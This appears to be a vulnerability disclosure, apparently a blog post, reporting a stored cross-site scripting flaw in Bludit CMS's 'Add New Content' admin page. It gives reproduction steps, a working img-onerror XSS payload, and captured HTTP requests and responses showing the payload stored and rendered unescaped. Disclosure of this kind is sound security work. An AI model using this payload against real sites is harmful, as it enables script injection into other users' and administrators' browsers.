Description
- It was noted that the application was vulnerable to Stored Cross Site Scripting in the "Add New Content" functionality
Stored XSS "Add New Content" Functionality #1:
Steps to Reproduce:
- Login with admin account and visit "New Content"
- In the "Source Code" field enter the following parameter "<iframe><textarea></iframe><img src="" onerror="alert(document.domain)">"
- Upon clicking on "Preview" the XSS payload would trigger
// HTTP POST request add new content
POST /bludit/admin/new-content HTTP/1.1
Host: 192.168.58.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
[...]
tokenCSRF=03a860fcc567fed86f6cb57e5877a469ef27e2ac&uuid=b219c568827ee49d5b8be839d6ab1043&type=published&coverImage=&content=<iframe><textarea></iframe><img+src%3d""+onerror%3d"alert(document.domain)">&category=&description=&date=2025-06-04+15%3A15%3A17&typeSelector=published&position=3&tags=&template=&externalCoverImage=&slug=xss&noindex=0&nofollow=0&noarchive=0&title=xss
// HTTP response
HTTP/1.1 301 Moved Permanently
Date: Wed, 04 Jun 2025 19:16:04 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
[...]
// HTTP GET request triggering the XSS
GET /bludit/admin/edit-content/xss HTTP/1.1
Host: 192.168.58.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
[...]
// HTTP response
HTTP/1.0 200 OK
Date: Wed, 04 Jun 2025 19:16:06 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
[...]
<!-- Editor -->
<textarea id="jseditor" class="editable h-100" style=""><iframe><textarea></iframe><img+src%3d""+onerror%3d"alert(document.domain)">
[...]
No comments:
Post a Comment